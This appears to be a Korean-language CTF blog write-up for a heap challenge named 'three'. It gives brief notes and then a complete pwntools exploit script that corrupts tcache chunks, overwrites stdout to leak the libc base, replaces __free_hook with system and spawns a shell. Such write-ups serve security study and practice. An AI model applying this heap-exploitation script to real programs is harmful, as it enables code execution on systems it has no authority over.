제한된 횟수의 heap 문제의 경우, overlapping chunk가 굉장히 중요함을 깨달음.
houseofatum에서 show 사라지고 한 번 더 할당할 수 있다.
main_arena 4bit brute forcing해서 stdout magic leak하고 __free_hook 덮어서 풀면 된다.
from pwn import *
#context.log_level= 'debug'
e = ELF('three')
s = process(e.path, aslr=False)
l = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
#l = ELF('libc.so.6', checksec=False)
ru = lambda x: s.recvuntil(x)
sl = lambda x: s.sendline(x)
p = lambda : pause()
io = lambda : s.interactive()
sla = lambda x,y: s.sendlineafter(x,y)
sa = lambda x,y: s.sendafter(x,y)
rv = lambda x: s.recv(x)
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
def raddr(a=6):
if(a==6):
return u64(rv(a).ljust(8,'\x00'))
else:
return u64(rl().strip('\n').ljust(8,'\x00'))
def menu(sel):
sla(':', sel)
def alloc(cont):
menu('1')
sa('tent:', cont)
def edit(idx, cont):
menu('2')
sla('idx:', str(idx))
sa('tent:', cont)
def delete(idx, sel):
menu('3')
sla('idx:', str(idx))
sla('(y/n):', str(sel))
alloc('123') #0
alloc(p64(0x11)*8) #1
delete('1', 'y')
delete('0', 'n')
edit('0', '\x50')
alloc('123') #1
alloc(p64(0)+p64(0x91)) #2
for _ in xrange(6):
delete('0', 'n')
delete('1', 'y')
edit('2', p64(0)+p64(0x51))
delete('0', 'n')
delete('0', 'n')
edit('2', p64(0)+p64(0x91))
delete('0', 'y')
edit('2', p64(0)+p64(0x91) + '\x60\x77')
alloc('123') #0
alloc(p64(0xfbad3887) + p64(0)*3 + p8(0)) #1
s.recv(8)
l_base = u64(s.recv(8).ljust(8, '\x00')) - 0x3ed8b0
log.info('l_base: {}'.format(hex(l_base)))
edit('2', p64(0) + p64(0x51))
delete('0', 'y')
edit('2', p64(0) + p64(0x51) + p64(l_base + l.symbols['__free_hook'] - 5))
alloc('123')
edit('2', p64(0) + p64(0x61))
delete('0', 'y')
alloc("1;sh;"+p64(l_base + l.symbols['system']))
menu('3')
sl('0')
io()'system > writeup' 카테고리의 다른 글
| 2019 holyshield babyheap (0) | 2019.12.04 |
|---|---|
| 2018 0ctf final baby (0) | 2019.12.03 |
| 2018 bctf houseofatum (0) | 2019.12.01 |
| 2019 d3ctf new_heap (0) | 2019.11.30 |
| 2019 csaw final arevenge (0) | 2019.11.29 |
